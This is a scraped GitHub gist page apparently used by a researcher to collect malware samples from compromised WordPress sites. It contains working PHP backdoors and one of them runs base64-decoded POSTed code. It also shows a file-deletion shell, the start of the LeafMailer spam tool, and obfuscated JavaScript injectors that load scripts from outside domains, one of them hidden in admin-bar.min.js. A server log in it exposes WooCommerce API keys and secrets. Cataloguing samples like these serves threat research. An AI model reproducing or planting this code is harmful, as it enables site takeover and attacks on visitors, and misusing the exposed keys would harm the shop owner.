Salvador Aguilar malwador
⚔️
malwador
/ gist:985a1979dc83357dd1a256c69e06363c
Created
September 17, 2020 21:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1 | |
| 2 <?php | |
| 3 | |
| 4 /** | |
| 5 * WordPress Diff bastard child of old MediaWiki Diff Formatter. | |
| 6 * | |
| 7 * Basically all that remains is the table structure and some method names. | |
| 8 * | |
| 9 * @package WordPress | |
| 10 * @subpackage Diff |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(isset($_GET['name'])){ | |
| if(function_exists("unlink")){ | |
| @unlink($_GET['name']); | |
| @unlink($_GET['name']); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php error_reporting(0);ini_set('display_errors', 0); if(isset($_POST['m']) && md5($_POST['m']) == "8b83a84918c63d1e9b9ab82e07e20539" ) {$a = base64_decode($_POST['a']);file_put_contents('_a','<?php '.$a);$a='_a';if(f ile_exists($a)){include($a);unlink($a);}} ?><script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js'></script> |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?><rss version="2.0" | |
| xmlns:content="http://purl.org/rss/1.0/modules/content/" | |
| xmlns:wfw="http://wellformedweb.org/CommentAPI/" | |
| xmlns:dc="http://purl.org/dc/elements/1.1/" | |
| xmlns:atom="http://www.w3.org/2005/Atom" | |
| xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" | |
| xmlns:slash="http://purl.org/rss/1.0/modules/slash/" | |
| > | |
| <channel> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!function_exists('do_rms_activation_task')) | |
| { | |
| /* ------------Register Config Variables------------ */ | |
| $GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php'; | |
| $GLOBALS['rms_disclaimer_text'] = []; | |
| $GLOBALS['rms_ajax_del_request'] = false; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| session_start(); | |
| error_reporting(0); | |
| set_time_limit(0); | |
| ini_set("memory_limit",-1); | |
| $leaf['version']="2.8"; | |
| $leaf['website']="leafmailer.pw"; | |
| $sessioncode = md5(__FILE__); |
malwador
/ index.html
Last active
July 9, 2020 19:15
Samples for Malware Campaign using the letsparty3[.]ga domain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * PEAR, the PHP Extension and Application Repository | |
| * | |
| * PEAR class and PEAR_Error class | |
| * | |
| * PHP versions 4 and 5 | |
| * | |
| * LICENSE: This source file is subject to version 3.0 of the PHP license |
malwador
/ gist:8b53206804ab0b09bfc6e2a1b294f941
Created
December 24, 2019 16:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@cTf-anrdesignkydex:/www/anrdesignkydex_812/logs# grep "HTTP/1.0 500" access.log* | |
| access.log:www.anrdesignkydexholster.com 35.171.19.91 [24/Dec/2019:05:23:09 +0000] GET "/wp-json/wc/v2/jilt/order-status?jilt_cart_token=f261d230-6fe0-4b79-b1c2-e129fb6031b8&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" HTTP/1.0 500 "-" "WooCommerce API Client-Ruby/1.4.0" "-" 172.69.63.165 1 1 "/" "index" php "jilt_cart_token=f261d230-6fe0-4b79-b1c2-e129fb6031b8&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" 0 - 91 647 0.910 0.908 | |
| access.log:www.anrdesignkydexholster.com 54.89.15.1 [24/Dec/2019:06:18:06 +0000] GET "/wp-json/wc/v2/jilt/order-status?jilt_cart_token=2d3c0bf5-1a27-4782-8c78-eb5ba8126f34&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" HTTP/1.0 500 "-" "WooCommerce API Client-Ruby/1.4.0" "-" 172.69.62.32 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| path: wp-includes/js/admin-bar.min.js | |
| (function(){"use strict";var e={open:!1,orientation:null},n=160,o=function(e,n){window.dispatchEvent(new CustomEvent("devtoolschange",{detail:{open:e,orientation:n}}))};setInterval(function(){var t=window.outerWidth-window.innerWidth>n,i=window.outerHeight-window.innerHeight>n,d=t?"vertical":"horizontal";i&&t||!(window.Firebug&&window.Firebug.chrome&&window.Firebug.chrome.isInitialized||t||i)?(e.open&&o(!1,null),e.open=!1,e.orientation=null):(e.open&&e.orientation===d||o(!0,d),e.open=!0,e.orientation=d)},500),"undefined"!=typeof module&&module.exports?module.exports=e:window.devtools=e})(),window.$sloaded=!1,setInterval(function(){if(!window.$sloaded&&!window.devtools.open&&"undefined"==typeof $s){var e=document.createElement(atob("c2NyaXB0"));e.src=atob("aHR0cHM6Ly96ZW5kZXNrLWNoYXJ0LmNvbS90b3AvYWNvLmpz"),e.type=atob("dGV4dC9qYXZhc2NyaXB0"),document.getElementsByTagName("head")[0].appendChild(e),window.$sloaded=!0}},500); | |
| "undefined"!=typeof jQuery?("undefined"==typeo |